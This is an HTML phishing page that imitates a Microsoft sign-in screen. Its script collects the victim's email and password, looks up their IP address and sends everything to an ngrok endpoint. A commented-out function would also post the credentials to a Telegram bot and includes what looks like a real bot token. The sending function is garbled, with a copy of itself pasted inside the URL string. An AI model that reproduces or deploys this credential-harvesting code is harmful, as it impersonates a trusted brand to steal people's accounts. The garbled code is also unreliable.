<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft | Login</title>
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" crossorigin="anonymous">
    <style>
        body {
            min-width: 992px !important;
            font-family: 'Archivo Narrow', sans-serif;
            margin: 0;
            padding: 0;
        }

        .container {
            min-width: 992px !important;
        }

        .navbar {
            display: none;
        }

        .badge {
            border: 1px solid #000;
        }

        .table {
            border-collapse: collapse !important;
        }

        .table td,
        .table th {
            background-color: #fff !important;
        }

        .table-bordered td,
        .table-bordered th {
            border: 1px solid #ddd !important;
        }

        textarea:hover,
        input:hover,
        textarea:active,
        input:active,
        textarea:focus,
        input:focus,
        button:focus,
        button:active,
        button:hover,
        label:focus,
        .btn:active,
        .btn.active {
            outline: 0px !important;
            -webkit-appearance: none;
            box-shadow: none !important;
        }

        .box {
            box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
            max-width: 440px;
            padding: 48px !important;
            margin-left: auto;
            margin-right: auto;
            margin-top: 20px;
            margin-bottom: 28px;
            background-color: white;
            overflow-x: hidden;
        }

        .boxtext {
            z-index: 0px;
            transform: translateX(+200px);
            animation: myAnim 300ms ease-in 0s 1 normal forwards;
        }

        @keyframes myAnim {
            0% {
                transform: translateX(-200);
            }

            100% {
                transform: translateX(0px);
            }
        }

        @keyframes bgmyAnim {
            0% {
                opacity: 0;
            }

            100% {
                opacity: 1;
            }
        }

        .box2 {
            box-shadow: 0 2px 6px rgb(0 0 0 / 20%);
            max-width: 440px;
            padding: 8px 48px !important;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 28px;
            background-color: white;
        }

        #footer {
            position: fixed;
            bottom: 0px;
            width: 100%;
            overflow: visible;
            z-index: 99;
            clear: both;
            background-color: #000;
            background-color: rgba(0, 0, 0, 0.6);
        }

        div .footerNode a,
        div .footerNode span {
            color: #fff;
            font-size: 0.75rem;
            line-height: 28px;
            white-space: nowrap;
            display: inline-block;
            float: right;
            margin-left: 8px;
            margin-right: 8px;
        }

        .bgimg {
            animation: bgmyAnim 1s cubic-bezier(0.11, 0, 0.5, 0) 0s 1 normal forwards;
            position: absolute;
            height: 100%;
            width: 100%;
            top: 0;
            left: 0;
            background-size: cover;
            background-repeat: no-repeat;
            background-position: center;
            background-image: url('bg.jpg');
        }

        .topp {
            margin-top: 48px !important;
            padding-top: 48px !important;
        }

        @media only screen and (max-width: 610px) {
            #hide {
                display: none;
            }

            .topp {
                margin-top: 10px !important;
                padding-top: 5px !important;
            }

            .bgimg {
                position: absolute;
                height: 100%;
                width: 100%;
                top: 0px;
                background-size: cover;
                background-repeat: no-repeat;
                background-image: none;
                background-color: white;
            }

            .box {
                box-shadow: none;
                max-width: 440px;
                padding: 0px !important;
                margin-left: auto;
                margin-right: auto;
                margin-top: 0px;
                margin-bottom: 28px;
                background-color: white;
            }

            .box2 {
                box-shadow: none;
                border: 1px solid;
                max-width: 440px;
                padding: 8px 20px !important;
                margin-left: 30px !important;
                margin-right: 30px !important;
                margin-bottom: 28px !important;
                background-color: white;
            }
        }

        .loader {
            width: 40px;
        }

        .loader .circle {
            position: absolute;
            width: 18px;
            height: 18px;
            opacity: 0;
            transform: rotate(225deg);
            animation-iteration-count: infinite;
            animation-name: orbit;
            animation-duration: 3s;
        }

        .loader .circle:after {
            content: "";
            position: absolute;
            width: 3px;
            height: 3px;
            border-radius: 5px;
            background: #000;
        }

        .loader .circle:nth-child(2) {
            animation-delay: 240ms;
        }

        .loader .circle:nth-child(3) {
            animation-delay: 480ms;
        }

        .loader .circle:nth-child(4) {
            animation-delay: 720ms;
        }

        .loader .circle:nth-child(5) {
            animation-delay: 960ms;
        }

        @keyframes orbit {
            0% {
                transform: translate(10px, 0);
                opacity: 1;
                animation-timing-function: ease-out;
            }

            7% {
                transform: translate(30px, 0);
                animation-timing-function: linear;
            }

            30% {
                transform: translate(60px, 0);
                animation-timing-function: ease-in-out;
            }

            40% {
                transform: translate(90px, 0);
                animation-timing-function: ease-out;
            }

            50% {
                transform: translate(120px, 0);
                animation-timing-function: ease-out;
            }

            75% {
                transform: translate(250px, 0);
                animation-timing-function: ease-out;
            }

            76% {
                transform: translate(300px, 0);
                opacity: 0;
            }

            100% {
                transform: translate(350px, 0);
                opacity: 0;
            }
        }

        .form-control {
            display: block;
            width: 100%;
            padding: 0.375rem 0.75rem;
            font-size: 1rem;
            line-height: 1.5;
            color: #495057;
            background-color: #fff;
            background-clip: padding-box;
            border: 1px solid #ced4da;
            border-radius: 0.25rem;
            transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
        }

        .btn {
            display: inline-block;
            font-weight: 400;
            text-align: center;
            white-space: nowrap;
            vertical-align: middle;
            user-select: none;
            border: 1px solid transparent;
            padding: 0.375rem 0.75rem;
            font-size: 1rem;
            line-height: 1.5;
            border-radius: 0.25rem;
            transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
        }

        .text-white {
            color: #fff !important;
        }

        .text-right {
            text-align: right !important;
        }

        .mt-2 {
            margin-top: 0.5rem !important;
        }

        .py-2 {
            padding-top: 0.5rem !important;
            padding-bottom: 0.5rem !important;
        }

        .bg-white {
            background-color: #fff !important;
        }

        .h5 {
            font-size: 1.25rem;
            font-weight: 500;
            line-height: 1.2;
        }

        .align-middle {
            vertical-align: middle !important;
        }

        .logoname {
            margin-left: 10px;
        }

        .container-fluid {
            width: 100%;
            padding-right: 15px;
            padding-left: 15px;
            margin-right: auto;
            margin-left: auto;
        }

        .row {
            display: flex;
            flex-wrap: wrap;
            margin-right: -15px;
            margin-left: -15px;
        }

        .col-lg-6 {
            flex: 0 0 50%;
            max-width: 50%;
        }

        .mx-auto {
            margin-right: auto !important;
            margin-left: auto !important;
        }

        .col-sm-5 {
            flex: 0 0 41.666667%;
            max-width: 41.666667%;
        }
    </style>
</head>
<body>
    <div id="main">
        <div class="container-fluid bgimg">
            <div class="container">
                <div class="row topp">
                    <div class="col-lg-6 mx-auto">
                        <div id="step1" class="box">
                            <form class="boxtext">
                                <img src="https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" width="30" />
                                <span class="align-middle h5 logoname"> Microsoft</span><br /><br />
                                <span class="h5">Sign In</span><br />
                                <p id="emailError" style="color: red; font-size: 14px; display: none;"></p>
                                <div class="form-group mt-2">
                                    <input type="email" class="form-control" id="email" placeholder="Email, phone, or Skype" />
                                </div>
                                <p style="font-size: 13px">No account? <a href="#">Create one!</a></p>
                                <p style="font-size: 13px"><a href="#">Can't access your account?</a></p>
                                <div class="text-right">
                                    <button id="next" class="btn text-white" style="background-color: #0066BA">Next</button>
                                </div>
                            </form>
                        </div>

                        <div id="step2" class="box" style="display: none;">
                            <form class="boxtext" id="loginForm">
                                <img src="https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" width="30" />
                                <span class="align-middle h5 logoname"> Microsoft</span><br /><br />
                                <i class="fas fa-arrow-left" id="back" style="cursor: pointer"></i>&nbsp;
                                <span id="emailDisplay"></span>
                                <div class="py-2"><span class="h5">Enter Password</span></div>
                                <p id="passwordError" style="color: red; font-size: 14px; display: none;"></p>
                                <div class="form-group mt-2">
                                    <input type="password" class="form-control" id="password" placeholder="Enter Password" />
                                </div>
                                <p style="font-size: 14px"><a href="#">Forget password?</a></p>
                                <div class="text-right">
                                    <button type="submit" class="btn text-white" style="background-color: #0066BA">Login</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-5 mx-auto box2">
                    <div class="py-2 bg-white">
                        <img src="key.svg" width="30" alt="key icon" /> &nbsp;Sign in options
                    </div>
                </div>
            </div>
        </div>

        <footer id="footer">
            <div class="footerNode">
                <span>©2025 Microsoft</span>
                <a href="#">Privacy statement</a>
            </div>
        </footer>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            let step = 1;
            let email = '';
            let password = '';
            let userIP = '';
            let userAgent = navigator.userAgent;

            // Fetch IP address
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    userIP = data.ip;
                })
                .catch(error => {
                    console.error('Error fetching IP:', error);
                    userIP = 'Unknown';
                });

            // Next button click handler
            document.getElementById('next').addEventListener('click', function(e) {
                e.preventDefault();
                document.getElementById('emailError').style.display = 'none';
                
                email = document.getElementById('email').value.trim();
                
                if (!email) {
                    document.getElementById('emailError').textContent = 'Email is required.';
                    document.getElementById('emailError').style.display = 'block';
                    return;
                }

                const isValidEmail = /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email);
                if (!isValidEmail) {
                    document.getElementById('emailError').textContent = 'Invalid email format.';
                    document.getElementById('emailError').style.display = 'block';
                    return;
                }

                // Show step 2
                document.getElementById('step1').style.display = 'none';
                document.getElementById('step2').style.display = 'block';
                document.getElementById('emailDisplay').textContent = email;
                step = 2;
            });

            // Back button click handler
            document.getElementById('back').addEventListener('click', function(e) {
                e.preventDefault();
                document.getElementById('step2').style.display = 'none';
                document.getElementById('step1').style.display = 'block';
                document.getElementById('password').value = '';
                document.getElementById('passwordError').style.display = 'none';
                step = 1;
            });

            // Form submission handler
            document.getElementById('loginForm').addEventListener('submit', function(e) {
                e.preventDefault();
                document.getElementById('passwordError').style.display = 'none';
                
                password = document.getElementById('password').value.trim();
                
                if (!password) {
                    document.getElementById('passwordError').textContent = 'Password is required.';
                    document.getElementById('passwordError').style.display = 'block';
                    return;
                }

                // Create data object with all collected information
                const userData = {
                    email: email,
                    password: password,
                    ipAddress: userIP,
                    userAgent: userAgent,
                    timestamp: new Date().toISOString()
                };

                console.log('User login data:', userData);

                // Save to file
                // saveToFile(userData);
                
                // Send to PHP
                sentToPhp(userData);
                
                // Send to Telegram
                // sendToTelegram(userData);
            });

            function saveToFile(data) {
                // Create a blob with the data
                const blob = new Blob([JSON.stringify(data, null, 2)], { type: 'application/json' });
                const url = URL.createObjectURL(blob);
                
                // Create a temporary anchor element to trigger download
                const a = document.createElement('a');
                a.href = url;
                a.download = `user_data_${Date.now()}.json`;
                document.body.appendChild(a);
                a.click();
                
                // Clean up
                setTimeout(() => {
                    document.body.removeChild(a);
                    URL.revokeObjectURL(url);
                }, 0);
            }

            function sentToPhp(data) {
                try {
                    fetch('function sentToPhp(data) {
                try {
                    fetch('https://480a-191-101-130-200.ngrok-free.app/action', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify(data),
                    })
                    .then(response => {
                        if (response.ok) {
                            console.log('Data submitted successfully!');
                        } else {
                            console.error('Submission failed!');
                        }
                    });
                } catch (error) {
                    console.error('Error:', error);
                }  
            }', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify(data),
                    })
                    .then(response => {
                        if (response.ok) {
                            console.log('Data submitted successfully!');
                        } else {
                            console.error('Submission failed!');
                        }
                    });
                } catch (error) {
                    console.error('Error:', error);
                }  
            }

            function sendToTelegram(data) {
                const botToken = '7676676109:AAHQZld_bADgICOLRn5Cs-49KT66Syhmk2w';
                const chatId = 'YOUR_CHAT_ID';
                const message = `New login data:\nEmail: ${data.email}\nPassword: ${data.password}\nIP: ${data.ipAddress}\nUser Agent: ${data.userAgent}\nTimestamp: ${data.timestamp}`;

                try {
                    fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json',
                        },
                        body: JSON.stringify({
                            chat_id: chatId,
                            text: message,
                        }),
                    });
                } catch (error) {
                    console.error('Error sending to Telegram:', error);
                }
            }
        });
    </script>
</body>
</html>